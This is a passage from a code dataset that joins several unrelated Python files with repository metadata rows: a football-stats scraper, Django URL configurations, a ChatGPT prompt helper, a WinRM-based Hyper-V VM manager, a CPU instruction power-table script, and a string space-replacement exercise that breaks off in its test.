                            squads.append(squad_info)
        except Exception as error:
            logging.error(f'[+] Erro ao coletar squads: {error}.')
    else:
        logging.error(f'[+] Erro ao executar requisição: status_code={rsp.status_code} reason={rsp.reason}')
    return squads
def get_squad_matchs_stats(url):
    """Scrape per-match stat rows from the first stats table at *url*.

    Sleeps 3s before the request (rate limiting). Rows whose header text
    does not look like a date (``\\d+-\\d+-\\d+``) are skipped. For the
    "matchlogs_against" table every stat key is prefixed with
    ``opponent_``. Each row dict is passed through ``parse_fields`` for
    type coercion. Returns [] on HTTP error or scraping exception.
    """
    sleep(3)
    rsp = requests.request('GET',url)
    content = rsp.content
    squad_matchs_stats = [] # accumulates one dict per match row; returned at the end
    if rsp.status_code<400:
        try:
            soup = BeautifulSoup(content, html_parser)
            table = soup.find(attrs={'class':'stats_table'})
            table_id = table.attrs['id']
            tbody = table.find('tbody')
            rows = tbody.find_all('tr')
            for row in rows:
                th = row.find('th')
                # NOTE(review): ``th.text or None`` can yield None, and
                # re.match(pattern, None) then raises — the except below
                # aborts ALL remaining rows, not just this one. Verify.
                date = th.text or None
                # Process the row only when the header is a real date.
                date_pattern = r'\d+-\d+-\d+'
                if re.match(date_pattern, date):
                    match_stats = {'date': date}
                    if table_id=='matchlogs_against':
                        match_stats.update({'opponent_'+td['data-stat']: re.sub(r'^\s','',td.text) for td in row.find_all('td')})
                    else:
                        match_stats.update({td['data-stat']: re.sub(r'^\s','',td.text) for td in row.find_all('td')})
                    # Coerce the string fields to their numeric types.
                    stats_round_parsed = parse_fields(match_stats, 'squads')
                    squad_matchs_stats.append(stats_round_parsed)
        except Exception as error:
            logging.error(f'[+] Erro ao coletar estatisticas do squad: {error}.')
    return squad_matchs_stats
def get_squad_log_types(urlbase, current_url, filters) -> list:
    """Collect match stats for every available "Log Types" filter of a squad page.

    Args:
        urlbase: site root used to resolve relative hrefs.
        current_url: URL of the page being scraped; used for the option marked
            'current', which has no href of its own.
        filters: BeautifulSoup nodes with CSS class 'filter'.

    Returns:
        list: stat dicts from get_squad_matchs_stats(), each tagged with a
        'stats_type' key naming the log type it came from.  [] on error.
    """
    log_types_stats = []
    log_types = []
    try:
        for filter in filters:
            if re.search(r'Log Types',filter.text):
                options = filter.find_all('div')
                for option in options:
                    # 'disabled' options have no data behind them; skip those.
                    if 'disabled' not in option.attrs.get('class'):
                        if 'current' not in option.attrs['class']:
                            log_ref = option.find('a').attrs['href']
                            log_name = re.subn(r'\n','',option.text)[0]
                            log_type = {'href': log_ref, 'name': log_name}
                            log_types.append(log_type)
                        else:
                            # The active option has no <a>; it points back to
                            # the page we are already on.
                            log_name = re.subn(r'\n','',option.text)[0]
                            log_type = {'href': current_url, 'name': log_name}
                            log_types.append(log_type)
        for log_type in log_types:
            log_type_url = urljoin(urlbase, log_type.get('href'))
            attr_stats = get_squad_matchs_stats(log_type_url)
            for stat in attr_stats:
                stat['stats_type'] = log_type.get('name')
                log_types_stats.append(stat)
    except Exception as error:
        logging.error(f'Erro ao coletar log types: {error}')
    return log_types_stats
def get_squad_infos(squad, urlbase) -> Squad:
    """Build a populated Squad object from a squad dict returned by get_squads().

    Fetches the squad page and fills id, name, governing country, manager,
    per-log-type stats and the player roster.  On any parsing error the
    partially-filled Squad object is still returned.

    Args:
        squad: dict with at least 'href', 'squad_id' and 'squad' keys.
        urlbase: site root used to resolve the relative href.
    """
    href = squad.get('href')
    url = urljoin(urlbase, href)
    rsp = requests.request('GET',url)
    content = rsp.content
    squad_obj = Squad()
    squad_obj.id = squad.get('squad_id')
    squad_obj.name = squad.get('squad')
    if rsp.status_code<400:
        try:
            soup = BeautifulSoup(content, html_parser)
            info_section = soup.find('div',attrs={'id':'info'})
            filters = soup.find_all('div',attrs={'class':'filter'}) # TODO: also match the "Log Types" label text
            players_tables = soup.find_all(attrs={'class':'table_wrapper', 'id':re.compile('stats')})
            infos = [p.text for p in info_section.find_all('p')]
            governing_country = list(filter(lambda x: re.search(r'Governing Country', x), infos))
            manager = list(filter(lambda x: re.search(r'Manager', x), infos))
            # Raw strings below fix the invalid '\s' escape sequences of the
            # original (a SyntaxWarning on modern Python); the '|$' alternative
            # makes findall() yield '' instead of raising when nothing matches.
            squad_obj.governing_country = re.findall(r'Governing Country:\s(.+)|$',governing_country[0])[0] if len(governing_country)>0 else None
            squad_obj.manager = re.findall(r'Manager:\s(.+)|$',manager[0])[0] if len(manager)>0 else None
            squad_obj.stats = get_squad_log_types(urlbase, url, filters)
            squad_obj.players = get_squad_players(players_tables)
        except Exception as error:
            logging.error(f'Erro ao coletar infos do jogador: {error}')
    return squad_obj
def get_squad_players(players_tables) -> list:
    """Collect basic information about the club's players.

    Use this function as a starting point to collect player statistics
    through the 'href' field of each returned dict.

    Args:
        players_tables: BeautifulSoup 'table_wrapper' nodes from the squad page.

    Returns:
        list: one dict per player holding name, href, player_id, the raw
        per-column stats, parsed integer age and the ISO nationality code.
    """
    squad_players = []
    for table in players_tables:
        try:
            body = table.find('tbody')
            if body:
                rows = body.find_all('tr')
                for row in rows:
                    if row:
                        # Header cell carries the player's name and link.
                        th = row.find('th')
                        # Data cells carry the stat columns.
                        td = row.find_all('td')
                        # Name and reference link of the player.
                        name = th.text
                        href = th.find('a').get('href')
                        player_id = href.split('/')[3]
                        player = {
                            'name': name,
                            'href': href,
                            'player_id': player_id
                        }
                        # Collect the player's aggregated stats into the dict;
                        # the 'matches' column additionally yields a link.
                        for stat in td:
                            if stat.attrs['data-stat']=='matches':
                                matches = stat.find('a').get('href')
                                player.update({'matches': matches})
                            player.update({stat.attrs['data-stat']: stat.text})
                        player['age'] = int(player.get('age').split('-')[0])
                        player['nationality'] = alpha.get(player.get('nationality').split(' ')[-1])
                        # Cast fields to their proper datatypes.
                        player_parsed = parse_fields(player, 'players')
                        squad_players.append(player_parsed)
        except Exception as e:
            logging.error(f'[+] Erro ao coletar link dos jogadores: {e}.')
    # Fixed: the original return line was garbled by fused metadata text.
    return squad_players
from django.conf.urls import include, url
from django.contrib.auth.decorators import login_required
from apps.mascota.views import (index,mascota_view,mascota_list,
mascota_edit,mascota_delete,MascotaList,MascotaCreate,MascotaUpdate,MascotaDelete,
listado)
# URL routing for the 'mascota' app; all class-based views are wrapped in
# login_required so only authenticated users can manage records.
urlpatterns = [
    # Examples:
    # url(r'^$', 'refugio.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),
    url(r'^$', index, name='index'),
    url(r'^nuevo$', login_required(MascotaCreate.as_view()), name='mascota_crear'),
    url(r'^listar', login_required(MascotaList.as_view()), name='mascota_listar'),  # NOTE(review): pattern lacks '$' anchor
    url(r'^editar/(?P<pk>\d+)/$', login_required(MascotaUpdate.as_view()), name='mascota_editar'),
    url(r'^eliminar/(?P<pk>\d+)/$', login_required(MascotaDelete.as_view()), name='mascota_eliminar'),
    url(r'^listado',listado,name='listado')  # NOTE(review): pattern lacks '$' anchor
]
| josuesf/pythonexamplodjango | apps/mascota/urls.py | urls.py | py | 840 | python | en | code | 0 | github-code | 13 |
# Load packages
import openai
import os
from langchain.chat_models import ChatOpenAI
from langchain.schema import SystemMessage, HumanMessage
from dotenv import load_dotenv
# Declare functions
def SendPromptToChatGPT(user_prompt,
                        system_message="You are a helpful assistant.",
                        # LLM parameters
                        openai_api_key=None,
                        temperature=0.0,
                        chat_model_name="gpt-3.5-turbo",
                        verbose=True):
    """Send a single system+user prompt to ChatGPT and return the response.

    Args:
        user_prompt: the user message to send.
        system_message: system-role message framing the assistant.
        openai_api_key: API key; if None, a .env file is loaded and the
            OPENAI_API_KEY environment variable is used instead.
        temperature: sampling temperature.  NOTE(review): currently not
            forwarded to ChatOpenAI -- confirm whether it should be.
        chat_model_name: model identifier.  NOTE(review): also not forwarded;
            ChatOpenAI falls back to its own default model.
        verbose: when True, echo the prompt and the response to stdout.

    Returns:
        The chat model's response message object (text in ``.content``).

    Raises:
        ValueError: if no API key is provided and none is found in the env.
    """
    # If OpenAI API key is not provided, then try to load from .env file
    if openai_api_key is None:
        load_dotenv()
        try:
            openai_api_key = os.environ['OPENAI_API_KEY']
        except KeyError:
            # Narrowed from a bare `except:` so only the missing key becomes
            # a ValueError and unrelated errors still propagate.
            raise ValueError("No API key provided and no .env file found. If you need a OpenAI API key, visit https://platform.openai.com/")
    # Create an instance of the ChatGPT chat model
    chat_model = ChatOpenAI(openai_api_key=openai_api_key)
    # Define the system and user messages
    system_msg = SystemMessage(content=system_message)
    user_msg = HumanMessage(content=user_prompt)
    # Send the system and user messages as a one-time prompt to the chat model
    response = chat_model([system_msg, user_msg])
    # Print the response
    if verbose:
        print("System message:")
        print(system_message, "\n")
        print("User prompt:")
        print(user_prompt, "\n")
        print("Response:")
        print(response.content)
    # Return the response
    return response
# # Test function
# response = SendPromptToChatGPT(
# user_prompt="""
# Break this key intelligence question into less than four sub-questions: "Which targets are Hamas most likely to strike in their war against Israel?"
# """
# ,
# system_message="""
# You are a project manager. You specialize in taking a key intelligence question and breaking it down into sub-questions.
# When creating the sub-questions, identify the main components of the original question. What are the essential elements or variables that the decision maker is concerned about?
# """,
# openai_api_key=open("C:/Users/oneno/OneDrive/Desktop/OpenAI key.txt", "r").read()
# )
| KyleProtho/AnalysisToolBox | Python/TextSummarizationAndGeneration/SendPromptToChatGPT.py | SendPromptToChatGPT.py | py | 2,260 | python | en | code | 0 | github-code | 13 |
"""docup_core URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls.static import static
from django.contrib import admin
# from django.shortcuts import redirect
from django.urls import path, include
from django.views.generic import RedirectView
from . import settings
from django.conf.urls import include, url
from fcm_django.api.rest_framework import FCMDeviceAuthorizedViewSet
# Branding for the Django admin site.
admin.site.site_header = "Neuronio Team"
admin.site.site_title = "Neuronio Admin"
admin.site.index_title = "Welcome to Server Portal"
urlpatterns = [
    # The bare domain redirects to the public marketing site.
    url(r'^$', RedirectView.as_view(url='https://neuronio.ir'), name='main site'),
    url(r'^baton/', include('baton.urls')),
    path('admin/', admin.site.urls),
    path('api/auth/', include('authentication.urls')),
    path('api/chat/', include('chat.urls')),
    path('api/', include('follow_up.urls')),
    path('payment/', include('payment.urls')),
    path('medical-test/', include('medical_test.urls')),
    path('api-auth/', include('rest_framework.urls')),
    # FCM push-notification device registration (POST) and listing (GET).
    path('devices/', FCMDeviceAuthorizedViewSet.as_view({'post': 'create', 'get': 'list'}), name='create_fcm_device'),
    path('document/',include('doc.urls'))
]
# Serve media/static files from Django only during development.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| arezoo88/docup_project | neuronio/urls.py | urls.py | py | 1,935 | python | en | code | 0 | github-code | 13 |
#!/usr/bin/env python3
# coding: utf-8
from winrm import Protocol
from winrm import Response
from base64 import b64encode
from datetime import datetime
from datetime import timedelta
import subprocess
import json
import os.path
import time
import platform
import re
vms = None  # cached list of VM dicts, populated by load_vms()
server = None  # winrm Protocol instance, created by setup()
config = None  # configuration dict, set by setup()
vms_cache_filename = None  # path of the JSON cache file, taken from config
# Hyper-V state codes mapped to human-readable names (see list_vms()).
states = {3: 'off',
          2: 'running',
          9: 'paused',
          6: 'saved'}
def connect(index):
    """
    Connect to virtual machine by index using freerdp

    Starts the VM first when it is neither running (2) nor paused (9),
    then launches a detached FreeRDP client against the Hyper-V host.

    Args:
        index (int): The machine's index generated in the current cache
    """
    load_vms()
    vm_id = vms[index]['Id']
    user = config['user']
    passw = config['pass']
    host = config['host']
    vm_info = get_vm(index)
    # get_vm() may return None/'' on failure; only power on when the VM is
    # in some other state than running or paused.
    if vm_info != '' and vm_info['State'] != 2 and vm_info['State'] != 9:
        start_vm(index)
        # Give the VM a moment to boot before attaching the console.
        time.sleep(10)
    if platform.uname()[0] == "Linux":
        freerdp_bin = "xfreerdp"
    elif platform.uname()[0] == "Windows":
        freerdp_bin = "wfreerdp.exe"
    # /vmconnect attaches to the VM console through the Hyper-V host itself.
    cmd = [freerdp_bin, '/v:{0}'.format(host), '/vmconnect:{0}'.format(vm_id), '/u:{0}'.format(user),
           '/p:{0}'.format(passw),
           '/t:{} [{}] {}'.format(host, index, vm_info['Name']), '/cert-ignore']
    # print(cmd)
    try:
        # Detach and silence the client so this CLI returns immediately.
        subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        #subprocess.Popen(cmd)
    except FileNotFoundError:
        print("{} not found in PATH".format(freerdp_bin))
    # retval = p.wait()
def update_cache(index, new_state):
    """Persist one machine's new state into the JSON cache file.

    Called after start/stop/pause/resume so the cached listing stays current.

    Args:
        index (int): machine index in the current cache
        new_state (int): state code, see the module-level ``states`` dict
    """
    vms[index]['State'] = new_state
    with open(vms_cache_filename, 'w') as cache_file:
        json.dump(vms, cache_file, indent=4)
def update_all_cache(force=False):
    """
    Checks cache file modification time and update vm list

    Creates cache file if nonexistent

    Args:
        force (bool, optional): Whether should force cache update or not

    Returns:
        bool: True for success
    """
    # datetime.min guarantees a refresh when the cache file does not exist.
    modified = datetime.min
    if os.path.isfile(vms_cache_filename):
        modified = datetime.fromtimestamp(os.path.getmtime(vms_cache_filename))
    # Refresh when the cache is older than the configured sync interval.
    if modified < datetime.now() - timedelta(hours=int(config['sync_interval'])) or force:
        ps_script = "Get-VM * | Select Name,Id,State,Uptime | ConvertTo-Json"
        rs = run_ps(ps_script, server)
        if rs.status_code != 0:
            print(rs.std_err)
            return False
        vms_json = json.loads(rs.std_out.decode('latin-1'))
        # If there is only one vm, make it a list
        if type(vms_json) is dict:
            vms_json = [ vms_json ]
        with open(vms_cache_filename, 'w') as vms_cache_file:
            json.dump(vms_json, vms_cache_file, indent=4)
    return True
def load_vms():
    """Read the JSON cache file into the module-level ``vms`` list.

    Returns:
        bool: True on success, False when the cache file cannot be read.
    """
    global vms
    try:
        with open(vms_cache_filename, 'r') as cache_file:
            vms = json.load(cache_file)
        return True
    except IOError:
        print("Cannot access file {0}".format(vms_cache_filename))
        return False
def list_vms():
    """Print a table of all cached virtual machines.

    Columns: index (used by the other commands), state name, VM name, uptime.
    """
    load_vms()
    # Listing
    print("-- Hyper-V Virtual Machine Listing --")
    # Header
    print("{0} {1} {2} {3}".format("Index".rjust(5), "State".ljust(7), "Name".ljust(30), "Uptime"))
    # enumerate() replaces the original vms.index(vm) lookup, which was O(n)
    # per row and returned the wrong index for duplicate entries.
    for i, vm in enumerate(vms):
        index = str(i).rjust(3)
        state = states.get(vm['State'], "unknown").ljust(7)
        name = str(vm['Name']).ljust(30)
        uptime = str(timedelta(hours=vm['Uptime']['TotalHours']))
        print("[{0}] {1} {2} {3}".format(index, state, name, uptime))
def list_vm_snaps(vm_index):
    """
    List vm snapshots by vm index

    Args:
        vm_index (int): The machine's index generated in the current cache
    """
    load_vms()
    vm_name = vms[vm_index]['Name']
    ps_script = "Get-VMSnapshot -VMName {0} | Select Name,ParentSnapshotName,CreationTime | ConvertTo-Json".format(vm_name)
    rs = run_ps(ps_script, server)
    if rs.status_code != 0:
        print(rs.std_err)
        return False
    try:
        snaps_json = json.loads(rs.std_out.decode('latin-1'))
    except Exception as e:
        # Empty/invalid JSON output means the VM has no checkpoints at all.
        print("Virtual Machine {} has no snapshots: {}".format(vm_name, e))
        return
    # If there is only one snap, make it a list
    if type(snaps_json) is dict:
        snaps_json = [ snaps_json ]
    print("-- Virtual Machine Snapshots --")
    print("{0} {1} {2}".format("Name".ljust(30), "Parent".ljust(30), "CreationTime"))
    for snap in snaps_json:
        snapname = str(snap['Name']).ljust(30)
        parent = str(snap['ParentSnapshotName']).ljust(30)
        # CreationTime arrives in JSON-date form '/Date(<milliseconds>)/';
        # extract the number and convert ms -> s for fromtimestamp().
        creation = datetime.fromtimestamp(float(re.search("[0-9]+", snap['CreationTime']).group())/1000.0)
        print("{0} {1} {2}".format(snapname, parent, creation.strftime("%d/%m/%Y %H:%M:%S")))
def restore_vm_snap(vm_index, snap_name):
    """Restore a named checkpoint on a virtual machine.

    Args:
        vm_index (int): The machine's index generated in the current cache
        snap_name (str): The name of the checkpoint to be restored

    Returns:
        bool: True if success
    """
    load_vms()
    target = vms[vm_index]['Name']
    print('Restoring snapshot "{0}" in {1}'.format(snap_name, target))
    command = 'Restore-VMSnapshot -Name "{0}" -VMName {1} -Confirm:$false'.format(snap_name, target)
    result = run_ps(command, server)
    if result.status_code != 0:
        print(result.std_err)
        return False
    print("Success")
    return True
def remove_vm_snapshot(vm_index, snap_name, recursive=False):
    """Delete a virtual machine checkpoint.

    Args:
        vm_index (int): The machine's index generated in the current cache
        snap_name (str): The name of the checkpoint to be deleted
        recursive (bool, optional): delete the checkpoint's children as well

    Returns:
        bool: True if success
    """
    load_vms()
    target = vms[vm_index]['Name']
    suffix = " -IncludeAllChildSnapshots" if recursive else ""
    command = ('Remove-VMSnapshot -VMName "{0}" -Name "{1}"'.format(target, snap_name)
               + suffix + " -Confirm:$false")
    print('Removing snapshot "{0}" in "{1}"'.format(snap_name, target))
    if recursive:
        print("and it's children")
    result = run_ps(command, server)
    if result.status_code != 0:
        print(result.std_err)
        return False
    print("Success")
    return True
def create_vm_snapshot(vm_index, snap_name):
    """Create a new checkpoint from the VM's current state.

    Args:
        vm_index (int): The machine's index generated in the current cache
        snap_name (str): The name of the checkpoint to be created

    Returns:
        bool: True if success
    """
    load_vms()
    target = vms[vm_index]['Name']
    command = 'Checkpoint-VM -Name "{0}" -SnapshotName "{1}" -Confirm:$false'.format(target, snap_name)
    print('Creating snapshot "{0}" in "{1}"'.format(snap_name, target))
    result = run_ps(command, server)
    if result.status_code != 0:
        print(result.std_err)
        return False
    print("Success")
    return True
def get_vm(vm_index):
    """Fetch Name, Id and State of one VM straight from the server.

    Args:
        vm_index (int): The machine's index generated in the current cache

    Returns:
        dict on success, None when the remote command fails.
    """
    load_vms()
    target = vms[vm_index]['Name']
    result = run_ps("Get-VM -Name {0} | Select Name,Id,State | ConvertTo-Json".format(target), server)
    if result.status_code != 0:
        print(result.std_err)
        return
    return json.loads(result.std_out.decode('latin-1'))
def stop_vm(vm_index, force=False):
    """Stop a virtual machine.

    Args:
        vm_index (int): The machine's index generated in the current cache
        force (bool): whether the shutdown should be forced

    Returns:
        bool: True on success
    """
    load_vms()
    target = vms[vm_index]['Name']
    command = "Stop-VM -Name {}".format(target)
    if force:
        command += " -Force"
    print('Stopping VM "{}", force: {}'.format(target, force))
    result = run_ps(command, server)
    if result.status_code != 0:
        print(result.std_err)
        return False
    update_cache(vm_index, 3)  # 3 == 'off'
    print("Success")
    return True
def resume_vm(vm_index):
    """Resume a paused virtual machine.

    Args:
        vm_index (int): The machine's index generated in the current cache

    Returns:
        bool: True on success
    """
    load_vms()
    target = vms[vm_index]['Name']
    print('Resuming VM "{0}"'.format(target))
    result = run_ps("Resume-VM -Name {0}".format(target), server)
    if result.status_code != 0:
        print(result.std_err)
        return False
    update_cache(vm_index, 2)  # 2 == 'running'
    print("Success")
    return True
def pause_vm(vm_index):
    """Pause (suspend) a running virtual machine.

    Args:
        vm_index (int): The machine's index generated in the current cache

    Returns:
        bool: True on success
    """
    load_vms()
    target = vms[vm_index]['Name']
    print('Pausing VM "{0}"'.format(target))
    result = run_ps("Suspend-VM -Name {0}".format(target), server)
    if result.status_code != 0:
        print(result.std_err)
        return False
    update_cache(vm_index, 9)  # 9 == 'paused'
    print("Success")
    return True
def start_vm(vm_index):
    """Start a virtual machine.

    Args:
        vm_index (int): The machine's index generated in the current cache

    Returns:
        bool: True on success
    """
    load_vms()
    target = vms[vm_index]['Name']
    print('Starting VM "{0}"'.format(target))
    result = run_ps("Start-VM -Name {0}".format(target), server)
    if result.status_code != 0:
        print(result.std_err)
        return False
    update_cache(vm_index, 2)  # 2 == 'running'
    print("Success")
    return True
def setup(configp):
    """Initialise module globals and build the WinRM protocol object.

    Args:
        configp (dict): configuration loaded from the config file; must carry
            'domain', 'user', 'pass', 'host' and 'cache_file' keys.
    """
    global config
    global server
    global vms_cache_filename
    config = configp
    domain = config['domain']
    user = config['user']
    passw = config['pass']
    host = config['host']
    vms_cache_filename = config['cache_file']
    server = Protocol(endpoint='http://{0}:5985/wsman'.format(host),
                      transport='ntlm',
                      # '\\' fixes the invalid '\{' escape of the original
                      # (SyntaxWarning on modern Python); the resulting
                      # DOMAIN\user string is byte-identical.
                      username='{0}\\{1}'.format(domain, user),
                      password=passw,
                      server_cert_validation='ignore')
def run_ps(ps, proto):
    """Run a PowerShell script on the target machine.

    The script is shipped base64-encoded as UTF-16LE, which is exactly what
    PowerShell's -encodedcommand flag expects, avoiding quoting issues.

    Args:
        ps (str): Powershell script to run
        proto (Protocol): Protocol containing target machine

    Returns:
        Response: Object containing stderr, stdout and exit_status
    """
    payload = b64encode(ps.encode('utf_16_le')).decode('ascii')
    return run_cmd('powershell -encodedcommand {0}'.format(payload), proto)
def run_cmd(cmd, proto):
    """Run a batch command on the target machine.

    Args:
        cmd (str): batch command line to run
        proto (Protocol): Protocol containing target machine

    Returns:
        Response: Object containing stderr, stdout and exit_status
    """
    shell_id = proto.open_shell()
    # try/finally guarantees the remote shell (and command) are cleaned up
    # even when fetching the output raises; the original leaked them.
    try:
        command_id = proto.run_command(shell_id, cmd)
        try:
            rs = Response(proto.get_command_output(shell_id, command_id))
        finally:
            proto.cleanup_command(shell_id, command_id)
    finally:
        proto.close_shell(shell_id)
    return rs
| reinaldorossetti/hypy | hypy/hvclient.py | hvclient.py | py | 11,685 | python | en | code | null | github-code | 13 |
#!/usr/bin/python
import bz2
import argparse
import os
import re
import statistics as st
import numpy as np
import json
EXPECTED_END_OF_SIMULATION = "Correct End of Simulation"
class PowerData(object):
    """One measured run of a single instruction: the three power components,
    the cycle count, and a validity flag (False when the simulation failed)."""
    def __init__(self, leakage, internal, switching, cycles, valid):
        self.leakage, self.internal = leakage, internal
        self.switching, self.cycles = switching, cycles
        self.valid = valid
class PowerTable(object):
    """Accumulates per-instruction power samples and reports median energies.

    NOTE(review): np.float128 is not available on all NumPy builds (e.g.
    Windows) -- confirm the target platform.
    """
    def __init__(self, cpu_freq):
        # power_table[instruction][index] -> PowerData for one measured run.
        self.power_table = {}
        # Seconds per clock cycle, kept in extended precision.
        self.time_per_cycle = np.float128(1.0) / np.float128(cpu_freq)
    def find_entry(self, index, instruction):
        # Lazily create the (instruction, index) slot with zeroed, valid data.
        if instruction not in self.power_table:
            self.power_table[instruction] = {}
        if index not in self.power_table[instruction]:
            self.power_table[instruction][index] = PowerData(np.float128(0.0), np.float128(0.0), np.float128(0.0), np.float128(0.0), True)
        return self.power_table[instruction][index]
    def update_power(self, index, instruction, leakage, internal, switching):
        # Record the three power components reported for one run.
        entry = self.find_entry(index, instruction)
        entry.leakage = np.float128(leakage)
        entry.internal = np.float128(internal)
        entry.switching = np.float128(switching)
    def update_cycles(self, index, instruction, cycles):
        # Record the cycle count of one run (parsed from the simulation log).
        entry = self.find_entry(index, instruction)
        entry.cycles = np.float128(cycles)
    def invalidate_data(self, index, instruction):
        # Exclude a failed/incomplete run from the statistics.
        entry = self.find_entry(index, instruction)
        entry.valid = False
    def get_energy(self, instruction):
        """Return median (leakage, internal, switching, total) energy over all
        valid runs of *instruction*; zeros when no valid run exists."""
        leakage = []
        internal = []
        switching = []
        total = []
        for index in self.power_table[instruction]:
            data = self.power_table[instruction][index]
            if data.valid:
                # Energy = power * time, time = cycles * seconds-per-cycle.
                t = data.cycles * self.time_per_cycle
                leakage.append(data.leakage * t)
                internal.append(data.internal * t)
                switching.append(data.switching * t)
                total.append((data.leakage + data.internal + data.switching) * t)
        if len(total) > 0:
            return (st.median(leakage), st.median(internal), st.median(switching), st.median(total))
        else:
            return (0.0, 0.0, 0.0, 0.0)
    def show_report(self):
        """Print a fixed-width table of per-instruction median energies."""
        print ("%15s %15s %15s %15s %15s" % ("Instruction", "Leakage", "Internal", "Switching", "Total"))
        for instruction in self.power_table:
            et = self.get_energy(instruction)
            # print "%s\t%f\t%f\t%f\t%f\t%f\t%f" % (key, st.median(leakage), st.median(internal), st.median(switching), st.median(total), st.stdev(total), st.variance(total))
            print ("%15s %1.14f %1.14f %1.14f %1.14f" % (instruction, et[0], et[1], et[2], et[3]))
def GenEnergyTable(init_pt, full_pt):
    """Print and return per-instruction energy = full-run minus init-run.

    Subtracting the init-phase energy removes the fixed startup cost so only
    the energy attributable to the instruction itself remains.  Instructions
    without usable data are printed as dashes and omitted from the result.

    Args:
        init_pt (PowerTable): measurements of the initialisation-only runs
        full_pt (PowerTable): measurements of the full runs

    Returns:
        dict: instruction -> [{'leakage', 'internal', 'switching'}] as floats
    """
    print ("%15s %15s %15s %15s %15s" % ("Instruction", "Leakage", "Internal", "Switching", "Total"))
    energy_table = {}
    for instruction in full_pt.power_table:
        init = init_pt.get_energy(instruction)
        full = full_pt.get_energy(instruction)
        # Only meaningful when both phases were measured and the full run
        # costs strictly more than its initialisation.
        if (init[3] > 0.0 and full[3] > init[3]):
            leakage = full[0] - init[0]
            internal = full[1] - init[1]
            switching = full[2] - init[2]
            print ("%15s %1.14f %1.14f %1.14f %1.14f" % (instruction,
                                                         leakage,
                                                         internal,
                                                         switching,
                                                         full[3] - init[3]))
            energy_table[instruction] = []
            energy_table[instruction].append({
                # Cast to plain float: np.float128 is not JSON-serialisable.
                "leakage": float(leakage),
                "internal": float(internal),
                "switching": float(switching)
            })
        else:
            e = "----------------"
            print ("%15s %15s %15s %15s %15s" % (instruction, e, e, e, e))
    return energy_table
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description = 'Generate power tables')
    parser.add_argument('-i', '--input', required=True, help='Input directory')
    parser.add_argument('-o', '--output', required=False, help='Output file')
    args = parser.parse_args()
    dir = args.input
    # Two tables: init-only runs vs full runs; both at a 40 MHz CPU clock.
    full_pt = PowerTable(40000000.0)
    init_pt = PowerTable(40000000.0)
    # File names follow '<index>_<instruction>[_...]' with extensions
    # .error (stderr), .log (simulation log) and .txt (power report).
    for file in os.listdir(dir):
        if "init" in file:
            pt = init_pt
        else:
            pt = full_pt
        sp_data = file.split("_")
        if len(sp_data) < 2:
            continue
        index = sp_data[0]
        if "not_taken" in file:
            # e.g. '<idx>_branch_not_taken_...' -> instruction name with suffix
            inst_name = sp_data[3] + "_not_taken"
        else:
            inst_name = sp_data[1]
        with open(dir + "/" + file, "r") as f:
            data = f.read();
        if file.endswith(".error"):
            # A non-empty error file invalidates the whole run.
            if len(data) > 0:
                print ("Error: %s is not empty" % (file))
                pt.invalidate_data(index, inst_name)
        elif file.endswith(".log"):
            if EXPECTED_END_OF_SIMULATION not in data:
                print ("Error: %s invalid simulation result" % (file))
                pt.invalidate_data(index, inst_name)
            else:
                # Cycle counter is printed as 'CLK(XXXXXXXX' in hex.
                idx = data.rfind("CLK(") + 4
                cycles = int(data[idx:idx+8], 16)
                pt.update_cycles(index, inst_name, cycles)
        elif file.endswith(".txt"):
            # Power report: line 16 holds leakage/internal/switching columns.
            power_data = data.split("\n")[15].split()
            pt.update_power(index, inst_name, float(power_data[1]), float(power_data[2]), float(power_data[3]))
    print ("")
    print ("######### Full result #########")
    full_pt.show_report()
    print ("")
    print ("######### Init result #########")
    init_pt.show_report()
    print ("")
    print ("######### Energy result #########")
    data = GenEnergyTable(init_pt, full_pt)
    with open(args.output, 'w') as outfile:
        json.dump(data, outfile)
| AlissonLinhares/riscv-power-tables | gen-power-table.py | gen-power-table.py | py | 5,980 | python | en | code | 0 | github-code | 13 |
"""
Space Replacement
-----------------
Write a method to replace all spaces in a string with %20. The string
is given in a characters array, you can assume it has enough space for
replacement and you are given the true length of the string.
You code should also return the new length of the string after replacement.
Note:
If you are using Java or Python,please use characters array instead of string.
Example 1:
- Input: string[] = "Mr John Smith" and length = 13
- Output: string[] = "Mr%20John%20Smith" and return 17
- Explanation: The string after replacement should be "Mr%20John%20Smith",
you need to change the string in-place and return the new length 17.
Example 2:
- Input: string[] = "LintCode and Jiuzhang" and length = 21
- Output: string[] = "LintCode%20and%20Jiuzhang" and return 25
- Explanation: The string after replacement should be
"LintCode%20and%20Jiuzhang", you need to change the string in-place and
return the new length 25.
Challenge:
Do it in-place.
Reference:
- https://algorithm.yuanbin.me/zh-hans/string/space_replacement.html
- https://www.lintcode.com/problem/space-replacement/
"""
import unittest
def replace_blank(string, length):
    """
    Replace all spaces in a string with %20 in place

    Time complexity: O(n)
    Space complexity: O(1)

    :param string: character array holding the string plus spare capacity
    :type string: list[str]
    :param length: the true length of given string
    :type length: int
    :return: the new length of the string after replacement
    :rtype: int
    """
    # Count only ' ' characters -- exactly those replaced below.  The original
    # counted with str.isspace(), so a tab/newline inflated the computed
    # length without ever being replaced, corrupting the output.
    num_space = 0
    for i in range(length):
        if string[i] == ' ':
            num_space += 1
    # compute new length
    new_length = num_space * 2 + length
    # Fill from right to left so characters not yet processed are never
    # overwritten by the expansion.
    for i in range(length - 1, -1, -1):
        if string[i] == ' ':
            string[new_length - 1] = '0'
            string[new_length - 2] = '2'
            string[new_length - 3] = '%'
            new_length -= 3
        else:
            string[new_length - 1] = string[i]
            new_length -= 1
    return num_space * 2 + length
class TestSpaceReplacement(unittest.TestCase):
    def test_space_replacement(self):
        # (input text, true length, expected text, expected new length)
        cases = [
            ('Mr John Smith', 13, 'Mr%20John%20Smith', 17),
